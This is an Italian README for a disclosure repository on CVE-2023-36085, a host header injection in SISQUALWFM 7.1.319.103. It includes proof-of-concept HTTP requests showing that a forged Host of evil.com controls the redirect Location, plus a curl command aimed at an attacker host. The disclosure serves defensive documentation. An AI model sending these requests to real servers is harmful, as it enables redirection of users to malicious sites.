
Questo repository contiene informazioni relative a CVE-2023-36085, una vulnerabilità di host header injection scoperta in SISQUALWFM versione 7.1.319.103, che consente a un aggressore di manipolare i collegamenti delle pagine web o reindirizzare gli utenti verso un sito dannoso. A questa vulnerabilità è stato assegnato il codice CVE-2023-36085 ed è stata corretta nella versione 7.1.319.111 e successive.
Questo repository contiene informazioni relative a una vulnerabilità di host header injection scoperta in SISQUALWFM versione 7.1.319.103, che consente a un attaccante di manipolare i collegamenti delle pagine web o reindirizzare gli utenti a un sito dannoso. A questa vulnerabilità è stato assegnato il CVE-2023-36085 ed è stata corretta nella versione 7.1.319.111 e successive.
Forniamo uno scenario di prova di concetto che dimostra la vulnerabilità di host header injection, mirando specificamente all'endpoint . Questa vulnerabilità consente a un attaccante di manipolare i collegamenti delle pagine web o reindirizzare gli utenti a un altro sito alterando l'host header.
/sisqualIdentityServer/coreGET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Per sfruttare questa vulnerabilità, un attaccante può utilizzare il seguente comando curl per modificare l'host header:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Questo repository è solo a scopo informativo e non deve essere utilizzato per attività dannose. La vulnerabilità è stata divulgata in modo responsabile al fornitore e il problema è stato risolto. È fondamentale seguire le linee guida dell'hacking etico e rispettare le pratiche di divulgazione responsabile nell'identificazione e segnalazione delle vulnerabilità.